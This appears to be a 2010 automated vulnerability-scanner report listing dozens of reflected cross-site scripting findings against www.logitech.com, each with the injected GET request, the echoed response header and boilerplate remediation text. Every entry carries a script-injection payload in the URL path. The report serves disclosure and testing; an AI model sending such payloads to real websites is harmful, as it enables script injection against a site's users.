GET /e850a"><script>alert(1)</script>a573fb14849/14279/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acd65</script><script>alert(1)</script>fca6d6196d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /acd65</script><script>alert(1)</script>fca6d6196d5/14280/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c460"><script>alert(1)</script>509a3c190d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /2c460"><script>alert(1)</script>509a3c190d0/14280/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67bee"><script>alert(1)</script>34ed157076e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /67bee"><script>alert(1)</script>34ed157076e/14976/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d08b</script><script>alert(1)</script>a2c981bdd40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /3d08b</script><script>alert(1)</script>a2c981bdd40/14976/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de98c"><script>alert(1)</script>72a8646bc33 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /de98c"><script>alert(1)</script>72a8646bc33/2062/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a874e</script><script>alert(1)</script>62f02bb3036 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a874e</script><script>alert(1)</script>62f02bb3036/2062/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73cab"><script>alert(1)</script>30f517d160a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /73cab"><script>alert(1)</script>30f517d160a/20916/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a30c9</script><script>alert(1)</script>c31ef0f56d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a30c9</script><script>alert(1)</script>c31ef0f56d9/20916/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b282d"><script>alert(1)</script>83dbf66b326 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /b282d"><script>alert(1)</script>83dbf66b326/20917/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42995</script><script>alert(1)</script>cad82b14edf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /42995</script><script>alert(1)</script>cad82b14edf/20917/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff247</script><script>alert(1)</script>b5bb4302480 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ff247</script><script>alert(1)</script>b5bb4302480/20918/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd91"><script>alert(1)</script>ba13ba050da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /dbd91"><script>alert(1)</script>ba13ba050da/20918/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a2a4"><script>alert(1)</script>22fabc67789 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /2a2a4"><script>alert(1)</script>22fabc67789/20920/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89db0</script><script>alert(1)</script>56314fd7a9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /89db0</script><script>alert(1)</script>56314fd7a9b/20920/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fdd3"><script>alert(1)</script>d3629de7407 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /1fdd3"><script>alert(1)</script>d3629de7407/20921/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b9d0</script><script>alert(1)</script>b4c12caa80a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8b9d0</script><script>alert(1)</script>b4c12caa80a/20921/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b65"><script>alert(1)</script>31ffe28bf6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /47b65"><script>alert(1)</script>31ffe28bf6d/22511/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc283</script><script>alert(1)</script>3f96130449 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fc283</script><script>alert(1)</script>3f96130449/22511/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 485c2"><script>alert(1)</script>b1c196248bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /485c2"><script>alert(1)</script>b1c196248bf/26006/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cec7a</script><script>alert(1)</script>4cd69b32f14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cec7a</script><script>alert(1)</script>4cd69b32f14/26006/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bce8"><script>alert(1)</script>8c620fbcf6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /2bce8"><script>alert(1)</script>8c620fbcf6a/30594/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4dba</script><script>alert(1)</script>a625bc8e1b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f4dba</script><script>alert(1)</script>a625bc8e1b2/30594/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cf7b</script><script>alert(1)</script>5f3bd9197d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8cf7b</script><script>alert(1)</script>5f3bd9197d2/30737/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8fa4"><script>alert(1)</script>2bfbd23abf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /b8fa4"><script>alert(1)</script>2bfbd23abf8/30737/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 873d6"><script>alert(1)</script>9ec4963de81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /873d6"><script>alert(1)</script>9ec4963de81/30814/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
